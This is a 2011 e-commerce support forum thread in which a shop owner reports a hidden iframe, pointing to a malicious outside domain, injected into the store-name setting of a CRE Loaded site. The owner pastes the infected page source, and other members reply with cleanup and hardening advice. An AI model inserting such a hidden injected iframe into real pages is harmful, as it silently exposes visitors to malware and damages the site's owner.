Loaded Commerce Community

Banner

View unanswered posts | View active topics


Board index » Loaded Commerce Support » Security Issues

All times are UTC - 5 hours




Post new topic Reply to topic  Page 1 of 1
  [ 3 posts ] 
  Previous topic | Next topic 
Author Message
gate7
 Post subject: willysy.com inject to config mystore name
PostPosted: Mon Jul 25, 2011 12:10 pm 
Offline
CRE Newbie
User avatar

Joined: Thu Apr 17, 2008 3:24 pm
Posts: 2
Hi, 24.07.2011 i find massive hack creloaded and oscomm system.
Configure is probably over by the trade name of the iframe. This is entered directly into the database. The problem is that of your business will be evaluated as harmful via google.com www, mozilla and it will block.

See you source code :
Code:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html dir="LTR" lang="xx">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO_8859-2">
<title>name our eshop<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe></title>
<meta name="Description" content="


this <iframe src='http://willysy.com/... google analytics evulates how harmfull web.
Before google mark your site, you can clean up this <iframe through configuration/my store/Store name. When your site designated the only option is directly modify via mysql.

It's only a temporary solution, I do not know how to protect trade against the same attack, please help...
Top
 Profile  
 
soundzgood2
 Post subject: Re: willysy.com inject to config mystore name
PostPosted: Mon Jul 25, 2011 5:10 pm 
Offline
CRE Legend
User avatar

Joined: Thu Jun 12, 2008 6:39 am
Posts: 2403
Location: New Zealand
Pretty simple - upgrade (you're posting this in the 6.2 forum, a cart that is several years out of date.)
There are a ton of security things you can do to limit this sort of issue, top of the list: upgrade.

Simon

_________________
www.codemehappy.com
For Cre Loaded tips, how-to articles and more

Top
 Profile  
 
Nimitz1061
 Post subject: Re: willysy.com inject to config mystore name
PostPosted: Sat Jul 30, 2011 1:59 pm 
Offline
CRE Legend

Joined: Sun Nov 09, 2003 1:00 am
Posts: 7301
Location: Baconton, GA USA
Not necessarily as simple as that.

This particular modification pretty much requires that the file manager be in place, or the FTP and/or control panel credentials be compromised. Security fixes in any release aren't going to help with that last.

Change your passwords frequently, put a crowbar in the wallet to install an SSL certificate, and delete file manager to help prevent this in future.

David

_________________
My CRE Loaded FAQ List
CRE Loaded Hosting

Top
 Profile  
 
Display posts from previous:  Sort by  
Post new topic Reply to topic  Page 1 of 1
  [ 3 posts ] 

Board index » Loaded Commerce Support » Security Issues

All times are UTC - 5 hours


Who is online

Users browsing this forum: No registered users and 1 guest

You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for:
Jump to:  
cron
It is currently Tue May 22, 2012 8:56 pm
Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group

Main Menu

Login

Forums Latest Activity

Top Listing

1. Cart2Cart - Shopping...
    Category: Shopping Cart Database Conversion Scripts
    
2. Points & Rewards PLUS!...
    Category: Add-Ons
    
3. Configuration Server...
    Category: Fixes
    
4. Credit Card with CCV
    Category: Payment Modules
    
5. CC7333_ATS
    Category: Templates
    
Show more...

Members Online


© CRE Loaded is a product of Chain Reaction Ecommerce, Inc. Usage & Privacy Policy